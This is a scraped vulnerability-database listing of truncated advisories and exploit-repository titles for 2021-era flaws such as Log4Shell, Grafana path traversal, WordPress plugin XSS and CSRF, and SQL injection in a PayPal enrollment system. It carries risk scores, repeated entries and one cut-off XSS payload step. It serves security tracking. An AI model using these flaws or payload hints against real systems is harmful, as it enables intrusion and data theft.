Learning Courses < 5.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the Email PDT identity token settings, which could allow high privilege users to perform cross-Site Scripting attacks even when the unfiltered_html capability is...
4.8CVSS
0.6AI Score
0.001EPSS
Learning Courses < 5.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the Email PDT identity token settings, which could allow high privilege users to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed PoC Visit to Paypal Setting Under Learning Plugin Enter the XSS payload (">) in Ema...
4.8CVSS
2.2AI Score
0.001EPSS
https://www.sourcecodester.com/ Online Enrollment Management System in PHP and PayPal Free Source Code 1.0 is affected by: Incorrect Access Control. The impact is: gain privileges...
6.5CVSS
0.001EPSS
https://www.sourcecodester.com/ Online Enrollment Management System in PHP and PayPal Free Source Code 1.0 is affected by: Incorrect Access Control. The impact is: gain privileges...
6.5CVSS
6.8AI Score
0.001EPSS
https://www.sourcecodester.com/ Online Enrollment Management System in PHP and PayPal Free Source Code 1.0 is affected by: Incorrect Access Control. The impact is: gain privileges...
6.5CVSS
6.9AI Score
0.001EPSS
https://www.sourcecodester.com/ Online Enrollment Management System in PHP and PayPal Free Source Code 1.0 is affected by: Incorrect Access Control. The impact is: gain privileges...
7.1AI Score
0.001EPSS
Apache Apisix Licensing Issue Vulnerability
Apache Apisix is a cloud-native microservices API gateway service from the Apache Foundation in the United States. The software is based on OpenResty and etcd for dynamic routing and plug-in hot-loading, and is suitable for API management in microservice systems. an authorization issue...
9.8CVSS
2.9AI Score
0.972EPSS
The 5 Most-Wanted Threatpost Stories of 2021
As 2021 draws to a close, and the COVID-19 pandemic drags on, it’s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site). While 2020 was all about...
10CVSS
AI Score
0.976EPSS
Exploit for Path Traversal in Apache Http Server
漏洞名称 Apache 远程代码执行 (CVE-2021-42013) 漏洞描述 Apache HTTP...
9.8CVSS
9.2AI Score
0.974EPSS
10CVSS
2.8AI Score
0.976EPSS
8.7AI Score
Exploit for Expression Language Injection in Apache Log4J
Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j...
9.4AI Score
8.2AI Score
How and why do we attack our own Anti-Spam?
We often use machine-learning (ML) technologies to improve the quality of cybersecurity systems. But machine-learning models can be susceptible to attacks that aim to "fool" them into delivering erroneous results. This can lead to significant damage to both our company and our clients. Therefore,.....
0.1AI Score
Heart to Heart OA2021 Winter Snow Edition has a logic flaw vulnerability
Heart OA based on the cloud computing model of SaaS architecture development, to meet the construction needs of the government cloud, industrial cloud, education cloud and other intelligent cloud platform. Heart OA2021 Winter Snow Edition has a logic flaw vulnerability, the attacker can use the...
1.6AI Score
9.8CVSS
8.6AI Score
0.974EPSS
Exploit for Path Traversal in Grafana
CVE-2021-43798 Grafana任意文件读取 1.installation ```shell...
7.5CVSS
2.2AI Score
0.975EPSS
Exploit for Path Traversal in Grafana
CVE-2021-43798 Grafana任意文件读取 1.installation ```shell...
7.5CVSS
2.2AI Score
0.975EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
log4j-Scan-Burpsuite Log4j漏洞(CVE-2021-44228)的Burpsuite检测插件...
9.1AI Score
Apache Log4j allows insecure JNDI lookups
Overview Apache Log4j allows insecure JNDI lookups that could allow an unauthenticated, remote attacker to execute arbitrary code with the privileges of the vulnerable Java application using Log4j. CISA has published Apache Log4j Vulnerability Guidance and provides a Software List. Description The....
10CVSS
10AI Score
EPSS
7.5CVSS
0.6AI Score
0.975EPSS
[IT 管理者むけ] Active Directoryのセキュリティ強化への対応をご確認ください
2021 年 11 月以降のセキュリティ更新プログラムには、脆弱性を解決するために、Active Directory における 4...
1.3AI Score
Exploit for Improper Input Validation in Microsoft
noPac Exploiting CVE-2021-42278 and CVE-2021-42287 ...
8.4AI Score
Exploit for Deserialization of Untrusted Data in Apache Log4J
CVE-2021-4428 复现 本DEMO是针对Log4j2...
10CVSS
10AI Score
0.976EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
Log4Shell复现环境 示例说明 被攻击机ip:47.47.47.47 攻击机ip:48.48.48.48...
10CVSS
10AI Score
0.976EPSS
7.5CVSS
3AI Score
0.975EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
Log4j-check 支持RC1绕过 log4J...
8.9AI Score
Exploit for Incorrect Authorization in Apache Druid
CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞 Code...
6.5CVSS
6.9AI Score
0.76EPSS
10CVSS
10AI Score
0.976EPSS
8.8CVSS
8.8AI Score
0.974EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
CVE-2021-44228-Demo 利用 CVE-2021-44228,通过 RMI 和 LDAP...
10CVSS
10AI Score
0.976EPSS
10CVSS
10AI Score
0.976EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
0x01、环境 Jdk7u21(随便版本都可以) 影响版本:Apache Log4j 2.x <= 2.14.1...
10CVSS
10AI Score
0.976EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
本工具仅为企业测试漏洞使用,严禁他人使用本工具攻击 本工具仅为企业测试漏洞使用,严禁他人使用本工具攻击...
9AI Score
10CVSS
AI Score
0.976EPSS
Prototype pollution in paypal-adaptive
paypal-adaptive through 0.4.2 manipulation of JavaScript objects resulting in Prototype Pollution. The PayPal function could be tricked into adding or modifying properties of Object.prototype using a proto ...
5.3CVSS
5.5AI Score
0.001EPSS
Prototype pollution in paypal-adaptive
paypal-adaptive through 0.4.2 manipulation of JavaScript objects resulting in Prototype Pollution. The PayPal function could be tricked into adding or modifying properties of Object.prototype using a proto ...
5.3CVSS
5.5AI Score
0.001EPSS
0.2AI Score
0.976EPSS
Exploit for Deserialization of Untrusted Data in Apache Log4J
CVE-2021-44228 Remote Code Injection In Log4j...
10CVSS
10AI Score
0.976EPSS
7.5CVSS
2.7AI Score
0.975EPSS
Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF
The plugin does not have CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged in admin delete arbitrary posts from the...
6.5CVSS
2.9AI Score
0.001EPSS
Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF
The plugin does not have CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged in admin delete arbitrary posts from the blog PoC...
6.5CVSS
3.1AI Score
0.001EPSS
PayPal Free Source Code has an unspecified vulnerability
PayPal Free Source Code is an online registration management system. A security vulnerability exists in PayPal Free Source Code 1.0 online registration management system, which allows attackers to obtain sensitive information and execute arbitrary SQL commands via the IDNO...
7.2CVSS
6.4AI Score
0.002EPSS
Malicious npm Code Packages Built for Hijacking Discord Servers
A series of malicious packages in the Node.js package manager (npm) code repository are looking to harvest Discord tokens, which can be used to take over unsuspecting users’ accounts and servers. The npm repository is an open-source home for JavaScript developers to share and reuse code blocks....
-0.5AI Score
Exploit for Path Traversal in Grafana
Grafana-File-Read Grafana未授权文件读取 影响版本:8.0.0-lastest ...
7.5CVSS
-0.4AI Score
0.975EPSS
7.5CVSS
0.8AI Score
0.975EPSS
Authenticated Blind & Error-based SQL injection vulnerability was discovered in Online Enrollment Management System in PHP and PayPal Free Source Code 1.0, that allows attackers to obtain sensitive information and execute arbitrary SQL commands via IDNO...
7.2CVSS
7.4AI Score
0.002EPSS
Authenticated Blind & Error-based SQL injection vulnerability was discovered in Online Enrollment Management System in PHP and PayPal Free Source Code 1.0, that allows attackers to obtain sensitive information and execute arbitrary SQL commands via IDNO...
7.2CVSS
0.002EPSS
Authenticated Blind & Error-based SQL injection vulnerability was discovered in Online Enrollment Management System in PHP and PayPal Free Source Code 1.0, that allows attackers to obtain sensitive information and execute arbitrary SQL commands via IDNO...
7.2CVSS
7.5AI Score
0.002EPSS
Authenticated Blind & Error-based SQL injection vulnerability was discovered in Online Enrollment Management System in PHP and PayPal Free Source Code 1.0, that allows attackers to obtain sensitive information and execute arbitrary SQL commands via IDNO...
7.8AI Score
0.002EPSS